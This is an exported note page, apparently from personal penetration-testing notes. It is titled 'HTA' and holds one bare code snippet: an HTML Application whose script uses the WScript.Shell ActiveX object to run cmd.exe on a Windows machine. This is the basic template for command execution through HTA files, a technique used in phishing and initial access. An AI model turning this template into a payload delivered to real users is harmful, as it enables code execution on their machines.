<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>HTA</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>HTA</h1>

      <div class="ck-content"><pre><code class="language-text-html">&lt;html&gt;
&lt;body&gt;
&lt;script&gt;
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;</code></pre>
      </div>
    </div>
  </body>

</html>